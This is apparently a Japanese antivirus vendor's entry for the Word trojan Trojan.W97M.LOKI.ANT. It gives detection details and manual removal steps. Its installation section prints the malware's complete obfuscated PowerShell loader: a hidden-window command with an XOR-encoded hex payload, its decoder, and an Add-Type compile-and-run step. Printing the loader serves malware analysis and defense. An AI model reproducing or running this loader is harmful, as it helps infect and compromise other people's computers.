プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:

  • マルウェアタイプ:
    トロイの木馬型

  • 破壊活動の有無:
    なし

  • 暗号化:
     

  • 感染報告の有無 :
    はい

  概要

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

  詳細

ファイルサイズ 137,585 bytes
タイプ DOCX
メモリ常駐 はい
発見日 2020年4月16日

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

  • powershell -WindowStyle Hidden Rk##$TRRk##$*Rfunction zc523 {param($t8223)$j85c2='f5d5d';$q5ec9d1='';for ($i=0; $i -lt $t8223.length;$i+=2){$v16cc3a=[convert]::ToByte($t8223.Substring($i,2),16);$q5ec9d1+=[char]($v16cc3a -bxor $j85c2[($i/2)%$j85c2.length]);}return $q5ec9d1;}Rk##$TRRk##$*R$ga3998 = '13460d5b0346661d461003585f40170f5b0315371f461050094867115b100f58011b2d084101470b16660147120f5601465f13460d5b0346661d461003584a710d07520a5a17125c07465f13460d5b0346661d461003584a7c2b5d40175c0a0115374c171250091b2a03415f386e164006590d05150759051546444f01540457041f3d7108592d0b450b47104e170f501608500806564419215b10144c345a0d0841591723034134470b0574005116034617174d3b151440060a5c0715171254105c0746501c4101145b447c0a126510474417035151054e7c0a41341247444357050406191712470d5b0346575602515f07501c5f3d7108592d0b450b47104e170f50160850080656441944700a12471d650b0f5b1015594617285a0502790d571607471d174d3b151440060a5c0715171254105c0746501c4101145b447c0a12651047441f075354574e4610470d085244525c0250530d024f0e3f71080a7c09450b14414c170f03470a50085507461944235b10471d365a0d5b105b17325c161240055934145a10500712174d6844164006590d0515174105125c0715011e4101470a46570b5a08465651005c071d2d5b103641161502515106075c5219317c0a1265104744040d050450040d4815110f5b1015175256570c564a150b401046400d5b10464555500503064d0e3f2259087c09165a16414c447e01470a035957074a025908174846700a41161f650b5c0a12084667100a780b43012b50095a161f174815370341285417127016470b140802540815504d6844154105410d0515014d1003470a1512095c00150b045652014c2f5b10651014150f56555e0002192d0841344116465057025c510205190d08414458505e0c571c5f164006590d0515174105125c07150d0841444d50045751024c4f4e2d5b10364116150551040557014608444c565154571d1e050056064c440553005c5702515650070556005d560d461c4d5d5c021d0551040557015b082d5b103641161b3e03470b1c1f015a105a440e07505153540e197c0a126510474405575c03535b44520000071d050255075701191e050056064c440753005c570251565751055100505654530255570554005756045002464f1c5f5c024e56060d525108597c0a126510474a3c50165a4d1d520b410b465d56010051075f48312f5b10651014151703520353591d312f5b106510141c510e110f5b10150352515c50565408540e0d001d455651530d051d07040d52024815035250024a051c01544a5a1141440101000d0154074d1c1f015a105a440e07505153540e19771d12503f68441c000650055b4e544d575719544d020019544d5d56485f7c0a12651047440854525357540159780514460c5408487408590b057d23590b0454081d574f0e295416155d05594a255a144c4c1c000650054a05485b0550535707504a064d0e0b045652014c085013152d08413441164e56060d52511b305a2d084152014c4f1e544d545604061c480854525357540148064d5d5d56010051075e1533035727590d035b10150703505d06590850131533035727590d035b101d4d5d4610470d0852444102520101082108430d470b0858015b10487201412209590050163654105d4c235b125c16095b09500a121b374501055c055922095900501648741445080f5605410d095b205410071c4f17383a425d5350530d461e1e050056064c44015c005457565105464f0e0750015f064a710b115b085a0502730d59014e4f070056551d4605015204550550530001015d575454505056045304535356550555040553055d530d505754500751015d560551015405000700515603510154520105055752515404464f1910535052504d0e34145a0750171566105416127c0a530b465905575604080a50134665165a0703461766100747107c0a005a4c41025201011c5f36470b560115464a66100747101d08075756574d5d47014111145b44055f1b451157080f5644461007410d56441541165c0a01151e565154064c4610145c0a524405000700564f4e1741160f5b0315125556555759445351515102175f4610145c0a52441f075354575b6610470d08524a700916411d0e0209474c5c0a12150d08545d5c5856510500561b28035b03410c5d5c4f08564f4e064c100315150351025459760b084301471048610b771d12504c56510500561b3713571741160f5b031d0d4a074d1955501c5f4c565154571e594e560c54164f1d1503510254446b4410060704063d1d0d1a564f15411512555655574a2a500a52100e684d0e19145010401608151d075307065f4819';Rk##$TRRk##$*R$ga39982 = zc523($ga3998);Rk##$TRRk##$*RAdd-Type -TypeDefinition $ga39982;Rk##$TRRk##$*R[ze2131]::x4bb57();Rk##$TRRk##$*RRk##$TRRk##$*RRk##$TRRk##$*_

作成活動

マルウェアは、以下のファイルを作成します。

  • {malware file path and name}

このウイルス情報は、自動解析システムにより作成されました。

  対応方法

対応検索エンジン: 9.850

手順 1

Windows XP、Windows Vista 、Windows 7、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

「Trojan.W97M.LOKI.ANT」で検出したファイル名を確認し、そのファイルを終了します。

[ 詳細 ]

  • すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
  • 検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
    セーフモードについては、こちらをご参照下さい。
  • 検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。

手順 3

以下のファイルを検索し削除します。

[ 詳細 ]
コンポーネントファイルが隠しファイル属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。
  • {malware file path and name}

手順 4

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.W97M.LOKI.ANT」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください